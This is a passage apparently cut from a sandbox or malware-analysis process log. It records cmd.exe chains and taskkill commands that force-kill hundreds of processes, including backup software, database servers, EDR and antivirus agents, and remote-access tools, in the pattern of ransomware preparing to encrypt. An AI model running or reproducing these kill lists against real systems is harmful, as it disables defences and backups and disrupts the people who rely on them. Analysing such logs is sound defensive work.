/F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
8444taskkill.exe taskkill /IM pg_ctl.exe /F
9060taskkill.exe taskkill /IM rcrelay.exe /F
9332taskkill.exe taskkill /IM SogouImeBroker.exe /F
2236taskkill.exe taskkill /IM CCenter.exe /F
8492taskkill.exe taskkill /IM ScanFrm.exe /F
10692taskkill.exe taskkill /IM d_manage.exe /F
10652taskkill.exe taskkill /IM RsTray.exe /F
11620taskkill.exe taskkill /IM wampmanager.exe /F
12020taskkill.exe taskkill /IM RavTray.exe /F
13004taskkill.exe taskkill /IM mssearch.exe /F
12544taskkill.exe taskkill /IM sqlmangr.exe /F
13740taskkill.exe taskkill /IM msftesql.exe /F
13884taskkill.exe taskkill /IM SyncBaseSvr.exe /F
13988taskkill.exe taskkill /IM oracle.exe /F
14992taskkill.exe taskkill /IM TNSLSNR.exe /F
2592cmd.exe cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
8908taskkill.exe taskkill /IM BackupExec.exe /F
8764taskkill.exe taskkill /IM Att.exe /F
9312taskkill.exe taskkill /IM mdm.exe /F
9148taskkill.exe taskkill /IM BackupExecManagementService.exe /F
9944taskkill.exe taskkill /IM bengine.exe /F
10688taskkill.exe taskkill /IM benetns.exe /F
10648taskkill.exe taskkill /IM beserver.exe /F
11976taskkill.exe taskkill /IM pvlsvr.exe /F
11712taskkill.exe taskkill /IM bedbg.exe /F
13304taskkill.exe taskkill /IM beremote.exe /F
11336taskkill.exe taskkill /IM beremote.exe /F
13576taskkill.exe taskkill /IM beremote.exe /F
13708taskkill.exe taskkill /IM beremote.exe /F
13504taskkill.exe taskkill /IM RemoteAssistProcess.exe /F
15196taskkill.exe taskkill /IM BarMoniService.exe /F
14472cmd.exe cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
8436taskkill.exe taskkill /IM VBoxSDS.exe /F
9152taskkill.exe taskkill /IM mysqld.exe /F
9648taskkill.exe taskkill /IM TeamViewer_Service.exe /F
9800taskkill.exe taskkill /IM TeamViewer.exe /F
10400taskkill.exe taskkill /IM CasLicenceServer.exe /F
11204taskkill.exe taskkill /IM tv_w32.exe /F
12216taskkill.exe taskkill /IM tv_x64.exe /F
7884taskkill.exe taskkill /IM rdm.exe /F
13120taskkill.exe taskkill /IM SecureCRT.exe /F
12468taskkill.exe taskkill /IM SecureCRTPortable.exe /F
13624taskkill.exe taskkill /IM VirtualBox.exe /F
13796taskkill.exe taskkill /IM VBoxSVC.exe /F
14008taskkill.exe taskkill /IM VirtualBoxVM.exe /F
15232taskkill.exe taskkill /IM abs_deployer.exe /F
15052